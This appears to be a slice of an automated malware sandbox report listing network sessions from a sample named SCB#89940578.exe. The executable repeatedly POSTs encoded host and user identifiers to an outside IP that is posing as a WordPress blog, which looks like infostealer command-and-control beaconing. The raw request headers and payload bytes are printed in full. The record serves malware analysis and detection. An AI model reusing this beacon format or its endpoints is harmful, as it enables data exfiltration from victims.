                                            Apr 26, 2024 04:43:02.551167965 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:02.729640961 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            39192.168.2.44978245.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:02.891159058 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:03.085201979 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:03.954221010 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:02 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:03.954283953 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:03.963582039 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:03.963936090 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:03.964090109 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:03.964334011 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:03.964476109 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:03.964519024 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:03.964731932 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:03.964745998 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            40192.168.2.44978345.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:04.288589954 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:04.478672028 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:05.382873058 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:04 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:05.382921934 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                            Data Ascii: <!DOCTYPE html><html
                                            Apr 26, 2024 04:43:05.383610964 CEST12INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22
                                            Data Ascii: lang="en-US"
                                            Apr 26, 2024 04:43:05.383722067 CEST25INData Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: ><head><meta charset="
                                            Apr 26, 2024 04:43:05.384151936 CEST5INData Raw: 55 54 46 2d 38
                                            Data Ascii: UTF-8
                                            Apr 26, 2024 04:43:05.384450912 CEST6INData Raw: 22 20 2f 3e 0a 09
                                            Data Ascii: " />
                                            Apr 26, 2024 04:43:05.393333912 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:05.393635988 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:05.393723011 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:05.572804928 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            41192.168.2.44978445.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:05.708324909 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:05.896349907 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:06.778214931 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:05 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:06.778306007 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:06.778343916 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:06.787729025 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:06.788065910 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:06.788135052 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:06.788193941 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:06.788324118 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:06.788366079 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:06.788446903 CEST761INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            42192.168.2.44978545.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:07.513137102 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:07.701816082 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:08.631318092 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:07 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:08.631377935 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:08.631414890 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:08.645730019 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:08.646087885 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:08.646128893 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:08.646163940 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:08.646353006 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:08.646393061 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:08.646560907 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            43192.168.2.44978645.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:08.959356070 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:09.153456926 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:10.088924885 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:09 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:10.088985920 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                            Data Ascii: <!DOCTYPE html><html
                                            Apr 26, 2024 04:43:10.089072943 CEST12INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22
                                            Data Ascii: lang="en-US"
                                            Apr 26, 2024 04:43:10.089241982 CEST25INData Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: ><head><meta charset="
                                            Apr 26, 2024 04:43:10.089793921 CEST5INData Raw: 55 54 46 2d 38
                                            Data Ascii: UTF-8
                                            Apr 26, 2024 04:43:10.089884996 CEST6INData Raw: 22 20 2f 3e 0a 09
                                            Data Ascii: " />
                                            Apr 26, 2024 04:43:10.089925051 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:10.098485947 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:10.098547935 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:10.098587990 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            44192.168.2.44978745.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:10.461205006 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
